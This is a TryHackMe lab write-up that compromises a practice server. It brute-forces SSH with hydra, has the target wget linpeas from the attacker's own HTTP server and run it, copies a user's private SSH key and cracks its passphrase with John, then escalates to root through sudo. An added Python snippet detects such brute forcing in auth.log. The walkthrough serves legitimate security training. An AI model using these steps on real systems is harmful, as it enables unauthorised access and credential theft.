This writeup is the first in my TryHackMe writeup series. I've carefully been dipping my toes into pentesting lately and love to keep notes, so I figured I'd write them out.
This is a writeup for Basic Pentesting
nb: I'm going to assume you're running Kali Linux and you're working from an empty folder you made for this room.
Let's take a look at this room. We're going to deploy the server and connect using OpenVPN. For more info on how to do that, visit the OpenVPN room. We'll skip all questions that don't need an answer.
In order to figure out which services are running on the server we've been given, we're going to run nmap. It's going to be useful to scan with our default safe scripts, so our command will look a little like this:
nmap -sV -sC <ip>
We might need this information later, so let's make sure we save it somewhere. I like to put all my scans in a single directory in my work folder, so let's `mkdir scans` and then output our nmap scan to a file in that folder:
nmap -sV -sC -oN scans/nmap <ip>
Visiting the IP we've been given in our browser, we can see that it's running an Apache server, so it's going to be worth looking around to see which folders live on this server. It just so happens we'll need that information for question #3 as well. To find hidden folders, we're going to be running `gobuster`. A simple `dir` scan with `gobuster` should be enough to get the information we need to get going. We're going to be using the `directory-list-2.3-medium` wordlist from `dirbuster` for this, which should already be on your Kali install.
gobuster dir \
  -u http://<ip>/ \
  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt \
  -o scans/gobuster
If we let our `gobuster` run for a while, we'll find our hidden directory. Let's fill that in and take a look in the folder. There are two files there. One of them mentions that a user referred to as "J" has a weak password. Let's make sure we remember that! Let's save both of these files for later reference.
We're told to brute force for a username and password. I don't like brute forcing for usernames; it feels inefficient. Of course, we already know we have two people who use this server, so we could just guess names. That too is inefficient, so let's do a little more digging.
If we open our `nmap` scan, we can see that Samba is running on this server. Let's go see if we can connect to the Samba server as an anonymous user.
Sure enough, we're connected! Now we just need to find out what's in this folder, if anything. When we run a quick `ls`, we can see that there's a `staff.txt` file. Let's `get staff.txt` and see what's in it! After closing the smb connection, we can take a look at the file we downloaded:
Announcement to staff: PLEASE do not upload non-work-related items to this share. I know it's all in fun, but this is how mistakes happen. (This means you too, Jan!) -Kay
Great, we now know that the two users we are going to try to hack are called Jan and Kay. If we think back to what we found in that hidden directory, we can assume that Jan has a weak password. Let's see if he is in fact the user we're looking for in question 5 and start cracking his password.
Cracking this weak password is going to be easy. We'll be using `hydra` to do all the work for us, and we'll use the `rockyou.txt` wordlist. There is an entire room to learn about hydra, so we'll skip teaching you that and just run the command:
hydra -l jan -P /usr/share/wordlists/rockyou.txt <IP> ssh
This might take a couple of minutes, so sit back and let `hydra` do the work for you. After a while, `hydra` will come back with a password we can use to connect to the server with SSH.
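Turning this around for the defender, here is an added example (mine, not part of the original writeup) that flags the pattern a hydra run like the one above leaves in sshd's auth.log: a burst of failed passwords from one source, followed by a successful login from the same source. The log lines are constructed for the example; the threshold and window are assumptions you would tune for your own hosts.

```python
import re
from collections import defaultdict
from datetime import datetime

# sshd auth.log lines for failed and successful password logins (publickey logins are ignored)
SSHD_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2$"
)

def parse_ts(ts, year=2024):
    # syslog timestamps carry no year; assume one so the lines can be ordered
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")

def detect_bruteforce(lines, threshold=10, window_s=60):
    """Return {ip: finding} for sources with >= threshold failures inside window_s,
    noting any successful login from the same source after the burst."""
    failures, successes = defaultdict(list), defaultdict(list)
    for line in lines:
        m = SSHD_RE.match(line)
        if not m:
            continue
        bucket = failures if m["result"] == "Failed" else successes
        bucket[m["ip"]].append((parse_ts(m["ts"]), m["user"]))
    findings = {}
    for ip, fails in failures.items():
        fails.sort()
        for i in range(len(fails) - threshold + 1):  # sliding window over failure times
            j = i + threshold - 1
            if (fails[j][0] - fails[i][0]).total_seconds() <= window_s:
                burst_end = fails[j][0]
                findings[ip] = {
                    "failures": len(fails),
                    "users": sorted({u for _, u in fails}),
                    "success_after_burst": [u for t, u in successes[ip] if t >= burst_end],
                }
                break
    return findings

# Constructed sample: a hydra-style burst against 'jan' that ends in a successful login, plus one benign typo elsewhere
SAMPLE_LOG = [
    f"Jan 12 10:01:{s:02d} web sshd[1234]: Failed password for jan from 10.10.14.5 port {51200 + s} ssh2"
    for s in range(12)
] + [
    "Jan 12 10:01:30 web sshd[1250]: Failed password for invalid user admin from 10.10.14.5 port 51300 ssh2",
    "Jan 12 10:02:05 web sshd[1300]: Accepted password for jan from 10.10.14.5 port 51400 ssh2",
    "Jan 12 10:05:00 web sshd[1400]: Failed password for kay from 192.168.1.20 port 40000 ssh2",
]
```

A non-empty `success_after_burst` is the finding worth paging on: it means the guessed credential worked, so the account needs a password reset and the session a look, not just a firewall rule.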
Once connected, we'll want to escalate our privileges on this server so we can access anything we want to. We kind of already know who the other user of this server is, but let's check the `/etc/passwd` file to make sure!
Among the users listed there, we'll find the answer to question 9. Let's see if we can escalate our privileges to get access to that user.
I tend to use `linpeas` to look for ways to escalate my privileges on a server, so we're going to do the same. Not because it's necessary on this server, but because it's really useful to learn how to do.
First, we're going to want to be in the `/var/tmp` folder, where we have write access, so run `cd /var/tmp`.
Then we'll need to somehow download the `linpeas.sh` file onto the server. Make sure you download a copy to your own computer first from the GitHub repo and put it in your project folder. From there, we'll set up a simple HTTP server with Python. Simply run `python -m SimpleHTTPServer` in your project directory (on Python 3 the equivalent is `python3 -m http.server`) and you'll have a webserver running on port 8000.
From the server, we're going to now download the `linpeas.sh` file and run it to find possible privilege escalation methods that will work on this server. So let's run `wget http://<YOUR OWN IP>:8000/linpeas.sh`, which downloads the file, and then `chmod +x linpeas.sh` to make the file executable. Now run `./linpeas.sh` and see what it comes up with.
Looking through the `linpeas` results, we can see that the other user has an `.ssh` folder with an `id_rsa` key in there. We might be able to use that, so let's make sure we grab that file and put it on our own computer. We'll just `cat /home/<other_user>/.ssh/id_rsa`, copy all of that and put it in an `id_rsa` file in our project directory. Because we want to be able to use it to connect to a server, we need to set the proper rights for that file. So run `chmod 600 id_rsa` and then try to connect to the server using
ssh -i id_rsa <other_user>@<IP>
Oh. A passphrase. We have yet to find that, but that's okay. Maybe we can just crack the `id_rsa` file to find the passphrase. Let's use John the Ripper for this. First, we need to turn this `id_rsa` file into something John can crack. `ssh2john.py` writes its output to stdout, so let's run `/usr/share/john/ssh2john.py id_rsa > crack` to put the crack-able information in the `crack` file.
From there, we're going to crack this file with John the Ripper, using the `rockyou.txt` wordlist again. I won't go into the specifics for John the Ripper as there are plenty of resources out there for that. Here's the command we're going to run:
john crack --wordlist=/usr/share/wordlists/rockyou.txt
This almost instantly comes back with our passphrase, which we can now use to connect to our server. We run our ssh command again, and now we fill in the passphrase we got from John:
ssh -i id_rsa <other_user>@<IP>
We're in! When we take a look at the files in our home folder, we see that there's a file called `pass.bak`. That's convenient! Let's open it using `cat` and fill in the answer to question 11!
As a little bonus, we can check what kind of access we have. Maybe we just want to be `root` at this point. Running `sudo -l` shows us we have access to all commands as root. Well, that's easy, let's make ourselves root then!
There we go. Now we're `root`. There's a little surprise waiting for you in `/root/root.txt`, so go check that out!